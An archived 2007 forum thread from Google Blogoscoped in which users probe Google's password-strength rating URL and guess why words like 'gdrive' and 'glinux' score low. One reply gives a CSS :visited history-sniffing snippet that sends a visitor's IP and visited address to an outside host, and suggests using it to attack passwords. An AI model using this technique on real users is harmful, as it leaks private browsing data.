Google Blogoscoped

Forum

Google password rating dictionary recognizes "gdrive" and "glinux" keywords

David Bloom [PersonRank 1]

Saturday, January 6, 2007
14 years ago12,427 views

You can get a "password strength" rating from Google by using https://www.google.com/accounts/RatePassword?Passwd=[password]. This is used by the "change password" page on Google Accounts to show a bar indicating password strength.

This rating not only considers password length, capitalization, and the use of numbers as well as letter, but also the use of various dictionary words.

For example, https://www.google.com/accounts/RatePassword?Passwd=password , https://www.google.com/accounts/RatePassword?Passwd=gmail , and https://www.google.com/accounts/RatePassword?Passwd=google all give the lowest possible rating of "1", because "password", "gmail", and "google" would be insecure passwords for a Google account. https://www.google.com/accounts/RatePassword?Passwd=blogger and https://www.google.com/accounts/RatePassword?Passwd=googlemail both give a rating of "2".

Interestingly, https://www.google.com/accounts/RatePassword?Passwd=gdrive gives a rating of "3", even though similar passwords of the similar length and complexity such as https://www.google.com/accounts/RatePassword?Passwd=gsearch or https://www.google.com/accounts/RatePassword?Passwd=gstore give the highest rating of "4". I also observed that https://www.google.com/accounts/RatePassword?Passwd=glinux has a rating of "3" even though https://www.google.com/accounts/RatePassword?Passwd=gunix and https://www.google.com/accounts/RatePassword?Passwd=gbsd have a rating of "4".

TOMHTML [PersonRank 10]

14 years ago #

Maybe they just use their index? "Gdrive" is in 882000 pages, "GLinux" in 22000, my passwords in 0 page.

Sam Davyson [PersonRank 10]

14 years ago #

Is it safe to Google your passwords? Hmm I guess so. They appear in your search history – but to see it you need the password anyway.

Ramibotros [PersonRank 10]

14 years ago #

If it's being googled server to server then there's no problem and it doesn't mean it should appear in ur search history.

David Bloom [PersonRank 1]

14 years ago #

Sam:

Google logins use SSL encryption but Google web search does not use encryption, so it is not safe to Google your passwords.

Pierre S [PersonRank 10]

14 years ago #

Moreover, if it's a specific password, it might get spotted. Not very interesting though.
But Googlers say they see really weird thing on the live query screens at Google

David Bloom [PersonRank 1]

14 years ago #

Also, it is possible to use clever CSS to reveal whether a visitor to your website has visited a specific URL (for example: #foobar:visited { background: url('http://example.com/user_has_visited?ip=123.45.67.89&addr=http://foobar.com'); }). Although the simple CSS example I provided requires a server callback, with more elaborate code this is not necessary and all processing can be done in Javascript (for IE/Opera, use a javascript: URL as the background; for Mozilla, attach a XBL binding to the :visited and detect based upon a constructor call). Basically, this could be used to easily run a dictionary or even brute force attack on your password by tricking you into visiting a page.

FerRory [PersonRank 1]

14 years ago #

I think the 1 too 4 ratio is a little bit of cr*p because my most insecure password I use, only letters is four.

Scott [PersonRank 0]

14 years ago #

Hmm....
A lv 4 password is pretty secure eh?

I think I'm going to run out and change my pass to something more secure like dogcatrat
https://www.google.com/accounts/RatePassword?Passwd=dogcatrat
cause it is just as secure as my old password:
dogcatrat553495248985699!4059
according to G:
https://www.google.com/accounts/RatePassword?Passwd=dogcatrat553495248985699!4059

ketra [PersonRank 0]

14 years ago #

you may want to look at:
http://nion.modprobe.de/blog/archives/497-Dont-use-Googles-password-validation-script.html

Ludwik Trammer [PersonRank 10]

14 years ago #

> Basically, this could be used to easily run a dictionary or even brute force
> attack on your password by tricking you into visiting a page.

I think it's easier to run dictionary attack on your password itself ;) You would notice if page attempted to load page with links to every possible world ;) And Google's search URL's differs depending on many factors. For example my search URL goes like this – http://www.google.pl/search?hl=en&lr=&safe=off&client=firefox-a&rls=com.ubuntu%3Aen-US%3Aofficial&hs=to3&q=my%20password&btnG=Search

Brian Mingus [PersonRank 10]

14 years ago #

For the 1 trillion word corpus they recently released, they considered any string that occured more than 200 times a word, IIRC.

David Bloom [PersonRank 1]

14 years ago #

Ludwik:

It's not hard to determine what someone's Google search URL format is – for example, a HTTP referrer header could be used to determine it.

Haochi [PersonRank 10]

14 years ago #

"1[put at-character here]3" (without quote) is a pretty secure password. :) Lv. 4.

Forum home

Advertisement

 
Blog  |  Forum     more >> Archive | Feed | Google's blogs | About
Advertisement

 

This site unofficially covers Google™ and more with some rights reserved. Join our forum!